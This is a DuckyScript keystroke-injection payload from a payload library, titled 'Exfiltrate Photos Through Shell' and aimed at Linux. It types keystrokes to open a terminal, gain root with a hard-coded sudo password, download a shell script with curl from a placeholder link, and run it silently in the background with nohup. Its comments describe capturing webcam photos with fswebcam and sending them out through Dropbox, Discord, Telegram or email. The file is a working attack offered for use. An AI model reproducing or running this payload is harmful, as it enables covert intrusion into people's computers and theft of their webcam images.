Path: blob/master/payloads/library/exfiltration/ExfiltratePhotosThroughShell/payload.txt
2968 views
1REM ##################################################2REM # |3REM # Title : Exfiltrate Photos Through Shell |4REM # Author : Aleff |5REM # Version : 1.0 |6REM # Category : Exfiltration |7REM # Target : Linux |8REM # |9REM ##################################################1011REM Requirements:12REM - Internet Connection13REM - Dropbox Token for example, but you can use whatever you want for the exfiltration (i.e. smtp e-mail, Discord, Telegram and so on..)14REM - sudo permissions15REM - if you need to install 'fswebcam'16REM - for add the -x permission to the script.sh downloaded1718REM REQUIRED - replace example.com with your script.sh link19DEFINE SCRIPT-SH-LINK example.com2021REM REQUIRED - sudo Password22DEFINE SUDO-PSWD example2324DELAY 100025CTRL-ALT t26DELAY 2000272829REM #### Permission ####3031REM This section of sudo time depends by the computer power on which it runs.32REM So if you know that the computer on which you run the payload is too slow, increase it by a few seconds, otherwise you can try running it as it is set now or smaller depending on your needs.3334STRING sudo su35ENTER36DELAY 50037STRING SUDO-PSWD38ENTER39REM DELAY Based On Computer Power40DELAY 50004142REM If you want to install the dependency of fswebcam you should decommend it.43REM STRING apt install fswebcam -y44REM ENTER45REM DELAY Based On Internet Power46REM DELAY 5000474849REM #### Script ####505152STRING curl53STRING SCRIPT-SH-LINK54STRING > script.sh55ENTER56REM DELAY Based On Internet Power57DELAY 40005859STRING chmod +x script.sh60ENTER61DELAY 5006263STRING nohup ./script.sh > /dev/null 2>&1 & exit64ENTER656667